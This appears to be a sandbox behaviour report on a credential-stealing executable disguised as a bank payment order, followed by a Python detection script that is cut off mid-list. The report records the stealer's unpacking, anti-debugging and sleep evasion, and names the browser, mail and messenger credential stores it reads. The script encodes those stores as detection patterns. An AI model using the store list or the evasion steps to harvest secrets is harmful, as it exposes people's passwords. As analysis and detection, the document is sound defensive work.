            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: pstorec.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: vaultcli.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: pstorec.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | File written: C:\Users\user\AppData\Local\Temp\tmc.ini
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | File opened: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.cfg
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Unpacked PE file: 2.2.Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Unpacked PE file: 3.2.Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Unpacked PE file: 4.2.Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: Yara match | File source: 00000001.00000002.7792890064.00000000025B5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2950982254.00000000055B5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 1_2_34F42806 push ecx; ret 1_2_34F42819
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 1_2_34F51219 push esp; iretd 1_2_34F5121A
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0044693D push ecx; ret 2_2_0044694D
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0044DB70 push eax; ret 2_2_0044DB84
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0044DB70 push eax; ret 2_2_0044DBAC
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00451D54 push eax; ret 2_2_00451D61
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_0044B090 push eax; ret 3_2_0044B0A4
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_0044B090 push eax; ret 3_2_0044B0CC
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_00451D34 push eax; ret 3_2_00451D41
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_00444E71 push ecx; ret 3_2_00444E81
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | File created: C:\Users\user\AppData\Local\Temp\nsf961A.tmp\System.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | API/Special instruction interceptor: Address: 5D3FDB4
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | API/Special instruction interceptor: Address: 2D3FDB4
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 2_2_0040DD85
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Window / User API: threadDelayed 3899
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Window / User API: threadDelayed 5790
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf961A.tmp\System.dll
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | API coverage: 9.9 %
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe TID: 5204 | Thread sleep count: 3899 > 30
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe TID: 2884 | Thread sleep time: -81000s >= -30000s
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe TID: 2884 | Thread sleep count: 5790 > 30
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe TID: 2884 | Thread sleep time: -17370000s >= -30000s
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Thread sleep count: Count: 3899 delay: -5
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 0_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_0040596D
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 0_2_004065A2 FindFirstFileW,FindClose, 0_2_004065A2
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 1_2_34F410F1 LdrInitializeThunk,LdrInitializeThunk,lstrlenW,lstrlenW,lstrcatW,lstrlenW,LdrInitializeThunk,lstrlenW,LdrInitializeThunk,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 1_2_34F410F1
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 1_2_34F46580 LdrInitializeThunk,FindFirstFileExA, 1_2_34F46580
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0040AE51 FindFirstFileW,FindNextFileW, 2_2_0040AE51
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 3_2_00407EF8
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00418981 memset,GetSystemInfo, 2_2_00418981
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004128000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | API call chain: ExitProcess graph end node | graph_0-2235
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | API call chain: ExitProcess graph end node | graph_0-2424
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | API call chain: ExitProcess graph end node | graph_3-34084
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 0_2_00402EC1 GetTempPathW,GetTickCount,GetModuleFileNameW,GetFileSize,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,SetFilePointer,LdrInitializeThunk, 0_2_00402EC1
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 1_2_34F460E2 LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_34F460E2
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 2_2_0040DD85
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 1_2_34F44AB4 mov eax, dword ptr fs:[00000030h] 1_2_34F44AB4
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 1_2_34F4724E GetProcessHeap, 1_2_34F4724E
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 1_2_34F460E2 LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_34F460E2
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 1_2_34F42639 IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_34F42639
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 1_2_34F42B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_34F42B1C

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: NULL target: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe protection: execute and read and write (3 identical entries)
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hvglntqjpwxqeafzzxxpsjflkurl"
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\sptdomaclepvggbdihsivorutbiuqfu"
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\cjzw"
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7800247694.00000000041C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000003.3234667457.00000000041C4000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7800247694.00000000041C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managern
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7800247694.00000000041C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manageru
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.000000000416E000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000003.3234667457.00000000041C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager<
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 1_2_34F42933 cpuid 1_2_34F42933
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 1_2_34F42264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_34F42264
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 3_2_004082CD
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 0_2_00403350 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 0_2_00403350
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

Source: Yara match | File source: 00000001.00000002.7799903641.000000000416E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.7799903641.0000000004175000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe PID: 5888, type: MEMORYSTR
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts (2 identical entries)
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt (2 identical entries)
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: ESMTPPassword 3_2_004033F0
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 3_2_00402DB3
Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 3_2_00402DB3
Source: Yara match | File source: Process Memory Space: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe PID: 5888, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe PID: 6284, type: MEMORYSTR
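The file and registry targets listed in this section are the browser, mail and instant-messaging credential stores that NirSoft-style recovery tools read. The Python below is an added example, not part of the Joe Sandbox report, that turns that list into a hunting check over file- and registry-access events: a process that reads stores from more than one family and is not the client application that owns the store is flagged, so a browser reading its own Login Data is ignored. Only the target paths are taken from the report; the event shape (process image name, target path), the owner-process names and the sample events are assumptions constructed for the demo.

```python
"""Correlate file/registry accesses against the credential stores the report lists.

A process that reads stores of several families (browser, mail, instant
messaging) and is not the application owning the store is the NirSoft-style
harvesting pattern.  Events are (process image name, target path) tuples.
"""
import re
from collections import defaultdict

# (family, owning processes, pattern).  Paths come from the report's "Stealing of
# Sensitive Information" section; the owner lists are an assumption about which
# legitimate client reads each store.  Patterns are anchored at the path tail.
CREDENTIAL_STORES = [
    ("browser", {"firefox.exe"},
     re.compile(r"\\Mozilla\\Firefox\\(profiles\.ini|Profiles\\[^\\]+\\(key4\.db|places\.sqlite))$", re.I)),
    ("browser", {"chrome.exe", "msedge.exe"},
     re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\(Login Data|Web Data)$", re.I)),
    ("mail", {"outlook.exe"},
     re.compile(r"^HKEY_CURRENT_USER\\Software\\(Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts"
                r"|Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles"
                r"|IncrediMail\\Identities|Microsoft\\Windows Live Mail)$", re.I)),
    ("im", set(),
     re.compile(r"^HKEY_CURRENT_USER\\Software\\(Google\\Google Talk\\Accounts|Paltalk)$", re.I)),
    ("identity", set(),
     re.compile(r"^HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\IdentityCRL\\Dynamic Salt$", re.I)),
]


def classify(target):
    """Return (family, owners) when `target` is a known credential store, else None."""
    for family, owners, pattern in CREDENTIAL_STORES:
        if pattern.search(target):
            return family, owners
    return None


def find_harvesters(events, min_families=2):
    """Map each process image to the sorted store families it touched without
    owning them, keeping only processes with at least `min_families` families."""
    touched = defaultdict(set)
    for image, target in events:
        hit = classify(target)
        if hit is None:
            continue
        family, owners = hit
        if image.lower() in owners:
            continue  # the client application reading its own store is expected
        touched[image].add(family)
    return {img: sorted(fams) for img, fams in touched.items() if len(fams) >= min_families}


# Constructed sample events: the targets are the ones the report lists, the
# chrome/firefox/explorer lines are benign controls added for the demo.
SAMPLE_EXE = "Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"
SAMPLE_EVENTS = [
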